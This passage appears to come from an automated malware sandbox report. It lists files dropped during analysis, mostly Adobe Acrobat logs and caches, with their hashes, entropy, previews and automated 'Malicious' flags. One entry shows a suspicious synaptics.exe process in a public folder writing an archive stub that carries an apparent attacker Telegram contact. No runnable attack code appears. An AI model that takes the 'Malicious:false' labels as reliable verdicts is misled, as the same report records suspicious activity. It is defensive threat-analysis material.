                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                      Entropy (8bit):1.1216922126537057
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:72qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8MaQpY54tZ7YTrMD:72qOB1nxCkvSAELyKOMq+8mKQ0M
                                                                                                                                                                                      MD5:7F784E8E9051D8E70834C231AE5CC670
                                                                                                                                                                                      SHA1:FA92DDE2E8DD8599EA458CC8488123CB60AD0DC1
                                                                                                                                                                                      SHA-256:1CEE1D9084D2C05B68B40073E4E6FE380128B61988409D60A9F5CBFD7AE964F6
                                                                                                                                                                                      SHA-512:A054A1E0F3289F4CCD25F01A81C0B3471A2CA8243E76ADD24D105A4141FBC534D20CE913A796474FB17754AB3B87C56679B8962FB860060B23F467601043EEA7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):246
                                                                                                                                                                                      Entropy (8bit):3.524398495091119
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8qKPln0w:Qw946cPbiOxDlbYnuRKtKP+w
                                                                                                                                                                                      MD5:48BC6BDE726D2D4D5655A39268BB9071
                                                                                                                                                                                      SHA1:9B67A690CFA195D546D0296B13D59838938E4389
                                                                                                                                                                                      SHA-256:C84908F50532CCABF1BD5D0ECA59C6060AC09C481904CE1CF5D5F7F805B91109
                                                                                                                                                                                      SHA-512:2F9A3B96893DD665FC25DA82BE6DC7A13632266A06D584869C36D7A3CDD0335387ED690268FB3F7ECF86FADFEEDF114A1ED84413A970B4E659554635AE63CBB2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.2./.1.1./.2.0.2.4. . .0.9.:.0.6.:.5.5. .=.=.=.....
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:Zip archive data (empty)
                                                                                                                                                                                      Category:modified
                                                                                                                                                                                      Size (bytes):88
                                                                                                                                                                                      Entropy (8bit):4.656643166394945
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:pjt/lNgggyIOm1e4NRzY7OK0n:NtfgbOKNR0yK0n
                                                                                                                                                                                      MD5:AF55500F6EC4DAB4FBD5D9AC534489C3
                                                                                                                                                                                      SHA1:086181C3B217AC19EDA1682BA36875E1CC023C3A
                                                                                                                                                                                      SHA-256:7CD8AD3A363758B18426429FD7CD0405A1B319D8893F8583B812E053D60BD0C5
                                                                                                                                                                                      SHA-512:923E2533AA6C793E80790180D9506F43B7A6CF1688B00BB421D9CA58A7658F2FE8D87E6EF1323B924E927451EE55151C56E713A222F618CAB8F5913ADFCFFD2D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:PK..................B.Time Created: 12-11-2024 (09:07:37).Contact: https://t.me/LoneNone
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:PDF document, version 1.6, 0 pages
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):358
                                                                                                                                                                                      Entropy (8bit):5.027766419453779
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:IngVMrexJzJT0y9VEQIFVmb/eu2g/86S1kxROO7AvgVSS6Qg7hgVSS6QgzCSyAAO:IngVMre9T0HQIDmy9g06JXDSSECSSclX
                                                                                                                                                                                      MD5:83C534580841513D25A9D565AB145162
                                                                                                                                                                                      SHA1:91E9315802E9217FDA223EEAAD7176201AAD931F
                                                                                                                                                                                      SHA-256:696B6E8A5D778267926C0F67A4D400A23757527626A3F0B7EFC32F36C53DABC8
                                                                                                                                                                                      SHA-512:4ED32961689DC689BBD33F0743B5D531193C043D055AD41C5BBEFF037FE11B65459ECC23F30C4CB87657DE347CC0D2E090651C54B3311D1AD7AC25C1A4EDB179
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:%PDF-1.6.%......1 0 obj.<</Pages 2 0 R/Type/Catalog>>.endobj.2 0 obj.<</Count 0/Kids[]/Type/Pages>>.endobj.3 0 obj.<<>>.endobj.xref..0 4..0000000000 65535 f..0000000016 00000 n..0000000061 00000 n..0000000107 00000 n..trailer..<</Size 4/Root 1 0 R/Info 3 0 R/ID[<A24CF652F081074BA89F30696C9E1304><A24CF652F081074BA89F30696C9E1304>]>>..startxref..127..%%EOF..
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:ASCII text, with very long lines (393)
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16525
                                                                                                                                                                                      Entropy (8bit):5.353642815103214
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:tbxtsuP+XEWJJQbnR8L31M7HeltV+KYm3wsa2KjF4ODkr/O8r2IUHUHMWwEyZRN2:aPL
                                                                                                                                                                                      MD5:91F06491552FC977E9E8AF47786EE7C1
                                                                                                                                                                                      SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                                                                                                                                                                                      SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                                                                                                                                                                                      SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16603
                                                                                                                                                                                      Entropy (8bit):5.324313509320432
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:gKNsPsyf3WlWgWN3WoWXW9W+WAW+WLqWejlnSneS4SMzzz/zqzJzRt030h04k7kP:gUSVfgvC3bqSLJTUqZBSeV3fjOFPyE/1
                                                                                                                                                                                      MD5:0807E329B56AD089BC7298ACA7D5FB83
                                                                                                                                                                                      SHA1:99867971A26C0E18E194752843852B35F9A62720
                                                                                                                                                                                      SHA-256:59F7D0EF6020A52C5A3C33A47DAC68C6363704F6EF27A3FD9B90A21196D4E3DB
                                                                                                                                                                                      SHA-512:D52446F0BCC82941191019B57AFC628D2C60BD1EB51B776FDA15D0A6F9CEC8783D66C88DB73C274A4A46C3E0F891C010E379AD6A0B7D2B03FD419FEFFA4D1ED2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:SessionID=b04ef29c-5f6e-4de7-a012-c1ea176878de.1731420409558 Timestamp=2024-11-12T09:06:49:558-0500 ThreadID=8176 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=b04ef29c-5f6e-4de7-a012-c1ea176878de.1731420409558 Timestamp=2024-11-12T09:06:49:567-0500 ThreadID=8176 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=b04ef29c-5f6e-4de7-a012-c1ea176878de.1731420409558 Timestamp=2024-11-12T09:06:49:567-0500 ThreadID=8176 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=b04ef29c-5f6e-4de7-a012-c1ea176878de.1731420409558 Timestamp=2024-11-12T09:06:49:568-0500 ThreadID=8176 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=b04ef29c-5f6e-4de7-a012-c1ea176878de.1731420409558 Timestamp=2024-11-12T09:06:49:572-0500 ThreadID=8176 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):29845
                                                                                                                                                                                      Entropy (8bit):5.420420326501284
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:0cbgIhPcbocbAIlncb2cbwI/RcbNcbQIVvcb2cbAINPcbI:fhWlA/TVANf
                                                                                                                                                                                      MD5:399A439EBC71D06EA77AFA26347D9E3C
                                                                                                                                                                                      SHA1:E6F21792AED5246B0107B598DF70EA19E0A0A10A
                                                                                                                                                                                      SHA-256:AC32375F759CDB25EE88228091CBA400467B08DFA6EFD955D082237B193CA2A2
                                                                                                                                                                                      SHA-512:FE9AC33E87EB6AA386CD70AF5A6537AF86FF860BEF06179D167A7C299FC5FF92A8498FE66DAA28E2EE4AFF8BAAF00B9418FF3D53E48AD23F8A7C7FAE7D9C9353
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):386528
                                                                                                                                                                                      Entropy (8bit):7.9736851559892425
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                                                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                                                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                                                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                                                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):758601
                                                                                                                                                                                      Entropy (8bit):7.98639316555857
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:ONh3PhTJJJJv+9UZhD+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEas:O3PJJJJJm94segf121YS8lkipdjMMNBn
                                                                                                                                                                                      MD5:CB5F67F174A83BC49AE00F228673ACD3
                                                                                                                                                                                      SHA1:4011A4F523AC0D44FEC4798B3F740254E7ADD159
                                                                                                                                                                                      SHA-256:C49C130E5C66898229A42D23B31711DCA32E2484C6EA6F469C7F4D25E051B940
                                                                                                                                                                                      SHA-512:F4BD81B6FA8D257A15FE0DD5993B381FBC08BA431487A00651E93FF458708ED895ED73B67745C9E0B2E89BDA5F6B6AD4FF3EDE31CE46827DB3A1E3BE074A986D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 416226
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):758601
                                                                                                                                                                                      Entropy (8bit):7.98639316555857
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:ONh3PhTJJJJv+9UZP5+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEag:O3PJJJJJm94kegf121YS8lkipdjMMNBT
                                                                                                                                                                                      MD5:73BB24FB6ED7C597A24F071778BA0CA6
                                                                                                                                                                                      SHA1:831E723BF775F5305016619D96DBC305C8295B5A
                                                                                                                                                                                      SHA-256:A4E4614041BF7E47AB5E0DCF3861406EB5C3A6B4F9701359C17CB21F4E877744
                                                                                                                                                                                      SHA-512:2A49928DE21E1B6F6ADDD56962D94DC0D84D4F6CBC8F6A8F52D8081552BBBD3C93081073B45CEFD816709425C267B35AEE0BF014184260DC18BCE280886FCC33
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):758601
                                                                                                                                                                                      Entropy (8bit):7.98639316555857
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:ONh3PhTJJJJv+9UZP5+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEas:O3PJJJJJm94kegf121YS8lkipdjMMNBn
                                                                                                                                                                                      MD5:0FD93E20C1612CF7CCA0771CD40D762F
                                                                                                                                                                                      SHA1:696E5156CF167B4CF06FF0D5DF3B5D46FABDBD77
                                                                                                                                                                                      SHA-256:9CA209D9F3FEF3163FA292A2523DFFB0CE40E2E1067F4E4502A3B9DC8263B56A
                                                                                                                                                                                      SHA-512:4CD9E26DE55F15209FD93F553965596986144C4B9A5301FFA8A067492DDB2E19DB2CE1B35F33BED0883705972151F058E6AAD5A143AD1BC0735D94B056BA6B58
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):386528
                                                                                                                                                                                      Entropy (8bit):7.9736851559892425
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                                                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                                                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                                                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                                                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):386528
                                                                                                                                                                                      Entropy (8bit):7.9736851559892425
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                                                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                                                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                                                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                                                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):758601
                                                                                                                                                                                      Entropy (8bit):7.98639316555857
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:ONh3PhTJJJJv+9UZP5+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEas:O3PJJJJJm94kegf121YS8lkipdjMMNBn
                                                                                                                                                                                      MD5:0FD93E20C1612CF7CCA0771CD40D762F
                                                                                                                                                                                      SHA1:696E5156CF167B4CF06FF0D5DF3B5D46FABDBD77
                                                                                                                                                                                      SHA-256:9CA209D9F3FEF3163FA292A2523DFFB0CE40E2E1067F4E4502A3B9DC8263B56A
                                                                                                                                                                                      SHA-512:4CD9E26DE55F15209FD93F553965596986144C4B9A5301FFA8A067492DDB2E19DB2CE1B35F33BED0883705972151F058E6AAD5A143AD1BC0735D94B056BA6B58
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):758601
                                                                                                                                                                                      Entropy (8bit):7.98639316555857
                                                                                                                                                                                      Encrypted:false
